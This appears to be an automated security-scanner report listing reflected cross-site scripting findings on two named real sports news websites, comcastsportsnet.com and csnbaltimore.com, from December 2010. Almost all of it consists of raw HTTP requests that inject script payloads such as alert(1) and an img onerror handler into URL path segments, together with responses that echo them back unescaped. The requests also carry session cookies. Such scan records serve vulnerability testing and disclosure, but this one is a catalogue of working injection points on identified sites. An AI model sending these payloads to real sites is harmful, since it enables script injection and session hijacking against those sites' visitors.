This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84 was submitted in the REST URL parameter 2. This input was echoed as 90356><img src=a onerror=alert(1)>54eae5f6d84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57e8b<script>alert(1)</script>f39eff7e154 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php HTTP/1.1 Host: www.comcastsportsnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:42 GMT Content-Length: 803 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd281<script>alert(1)</script>15e0ecd7081 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php HTTP/1.1 Host: www.comcastsportsnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:42 GMT Content-Length: 803 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55ff1<script>alert(1)</script>3b3a53d4fc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php HTTP/1.1 Host: www.comcastsportsnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:42 GMT Content-Length: 803 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3544c<script>alert(1)</script>c22839dba9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c HTTP/1.1 Host: www.comcastsportsnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:43 GMT Content-Length: 803 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 235bb<script>alert(1)</script>3097e54bcbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/235bb<script>alert(1)</script>3097e54bcbb HTTP/1.1 Host: www.comcastsportsnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:41 GMT Content-Length: 776 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/235bb<script>alert(1)</script>3097e54bcbb"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3384<script>alert(1)</script>cb66b36a9e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesf3384<script>alert(1)</script>cb66b36a9e6/main HTTP/1.1 Host: www.comcastsportsnet.com Proxy-Connection: keep-alive Referer: http://www.comcastsportsnet.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:37:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:38 GMT Connection: close Content-Length: 776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesf3384<script>alert(1)</script>cb66b36a9e6/main"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0707<script>alert(1)</script>573843f4b66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/mainc0707<script>alert(1)</script>573843f4b66 HTTP/1.1 Host: www.comcastsportsnet.com Proxy-Connection: keep-alive Referer: http://www.comcastsportsnet.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:37:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:38 GMT Connection: close Content-Length: 795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/mainc0707<script>alert(1)</script>573843f4b66"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload daf8e<script>alert(1)</script>e5f3917f7f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:54 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 34164<script>alert(1)</script>0648d394dfc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:57 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b173<script>alert(1)</script>8c0b83a496b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:58 GMT Content-Length: 818 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb8c0<script>alert(1)</script>2ad29b4003b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:02 GMT Content-Length: 804 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 75610<script>alert(1)</script>2b8065799c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:59 GMT Content-Length: 811 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4947<script>alert(1)</script>b18abeac900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:30:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:30:58 GMT Content-Length: 811 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a08ac<script>alert(1)</script>3fd554facc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:02 GMT Content-Length: 809 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3db20<script>alert(1)</script>bb2d756dbfb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:04 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77970<script>alert(1)</script>52d6f2862ce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:05 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d2fad<script>alert(1)</script>b7678c4d177 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:04 GMT Content-Length: 815 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dbfd4<script>alert(1)</script>a999fa7914c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:05 GMT Content-Length: 818 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 482cc<script>alert(1)</script>7bb299f040c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:09 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2df49<script>alert(1)</script>ad9caa4b51a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:10 GMT Content-Length: 820 Connection: close
